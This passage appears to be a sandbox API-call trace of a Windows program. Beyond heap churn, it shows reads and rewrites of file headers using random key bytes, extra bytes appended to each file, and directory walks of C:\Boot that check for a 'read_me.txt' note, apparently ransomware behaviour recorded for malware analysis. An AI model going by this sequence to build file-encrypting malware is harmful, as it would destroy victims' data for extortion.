returned 0x280000 [0073.694] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.694] GetProcessHeap () returned 0x280000 [0073.694] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.694] GetProcessHeap () returned 0x280000 [0073.694] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.694] GetProcessHeap () returned 0x280000 [0073.694] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.694] GetProcessHeap () returned 0x280000 [0073.694] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.695] GetProcessHeap () returned 0x280000 [0073.695] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.695] GetProcessHeap () returned 0x280000 [0073.695] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.695] GetProcessHeap () returned 0x280000 [0073.695] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.695] GetProcessHeap () returned 0x280000 [0073.695] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.695] GetProcessHeap () returned 0x280000 [0073.695] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.695] GetProcessHeap () returned 0x280000 [0073.695] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.695] GetProcessHeap () returned 0x280000 [0073.695] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.695] GetProcessHeap () returned 0x280000 [0073.695] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.695] GetProcessHeap () returned 0x280000 [0073.695] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.695] GetProcessHeap () returned 0x280000 [0073.695] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.695] GetProcessHeap () returned 0x280000 [0073.696] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.696] GetProcessHeap () returned 0x280000 [0073.696] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.696] GetProcessHeap () returned 0x280000 [0073.696] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.696] GetProcessHeap () returned 0x280000 [0073.696] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.696] GetProcessHeap () returned 0x280000 [0073.696] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.696] GetProcessHeap () returned 0x280000 [0073.696] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dd2c28 [0073.696] GetProcessHeap () returned 0x280000 [0073.696] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.696] GetProcessHeap () returned 0x280000 [0073.696] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0073.696] GetProcessHeap () returned 0x280000 [0073.696] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0073.696] GetProcessHeap () returned 0x280000 [0073.696] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.696] GetProcessHeap () returned 0x280000 [0073.696] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0073.696] SetFilePointerEx (in: hFile=0x7b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.696] WriteFile (in: hFile=0x7b0, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0073.697] WriteFile (in: hFile=0x7b0, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0073.697] GetProcessHeap () returned 0x280000 [0073.697] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0073.697] GetProcessHeap () returned 0x280000 [0073.697] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0073.697] GetProcessHeap () returned 0x280000 [0073.697] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0073.697] CloseHandle (hObject=0x7b0) returned 1 [0073.698] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 1 [0073.698] SetFilePointerEx (in: hFile=0x7b8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.698] ReadFile (in: hFile=0x7b8, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0073.698] SetFilePointerEx (in: hFile=0x7b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.698] GetProcessHeap () returned 0x280000 [0073.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0073.698] GetProcessHeap () returned 0x280000 [0073.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0073.698] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0073.698] GetProcessHeap () returned 0x280000 [0073.698] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0073.699] ReadFile (in: hFile=0x7b8, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0073.793] SetFilePointerEx (in: hFile=0x7b8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.794] WriteFile (in: hFile=0x7b8, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.794] GetProcessHeap () returned 0x280000 [0073.794] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.795] GetProcessHeap () returned 0x280000 [0073.795] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.795] GetProcessHeap () returned 0x280000 [0073.796] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d94210 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d94210 | out: hHeap=0x280000) returned 1 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.796] GetProcessHeap () returned 0x280000 [0073.796] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.797] GetProcessHeap () returned 0x280000 [0073.797] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.797] GetProcessHeap () returned 0x280000 [0073.798] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dd2c28 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7dc1440 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dd2c28 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dd2c28 | out: hHeap=0x280000) returned 1 [0073.798] GetProcessHeap () returned 0x280000 [0073.798] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0073.798] SetFilePointerEx (in: hFile=0x7b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.798] WriteFile (in: hFile=0x7b8, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0073.799] WriteFile (in: hFile=0x7b8, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0073.799] GetProcessHeap () returned 0x280000 [0073.799] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0073.799] GetProcessHeap () returned 0x280000 [0073.799] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0073.799] GetProcessHeap () returned 0x280000 [0073.799] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0073.799] CloseHandle (hObject=0x7b8) returned 1 [0073.801] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 2 [0073.801] GetProcessHeap () returned 0x280000 [0073.801] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a40080 [0073.801] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\*") returned 19 [0073.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.801] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\.") returned 19 [0073.801] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0073.801] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\..") returned 20 [0073.801] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.801] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui") returned 33 [0073.801] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.801] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0073.801] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui") returned 33 [0073.801] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.802] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1677b0b0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.802] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\read_me.txt") returned 29 [0073.802] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\read_me.txt" (normalized: "c:\\boot\\en-us\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b0 [0073.802] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.802] CloseHandle (hObject=0x7b0) returned 1 [0073.802] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x722fb60 | out: lpFindFileData=0x722fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1677b0b0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2000002, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.802] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.802] wnsprintfW (in: pszDest=0x8a40080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\read_me.txt") returned 29 [0073.802] GetProcessHeap () returned 0x280000 [0073.802] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a40080 | out: hHeap=0x280000) returned 1 [0073.802] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 6 [0073.802] GetProcessHeap () returned 0x280000 [0073.802] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a20070 | out: hHeap=0x280000) returned 1 [0073.802] GetProcessHeap () returned 0x280000 [0073.802] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a20070 [0073.802] wnsprintfW (in: pszDest=0x8a20070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\es-ES\\*") returned 19 [0073.802] FindFirstFileW (in: 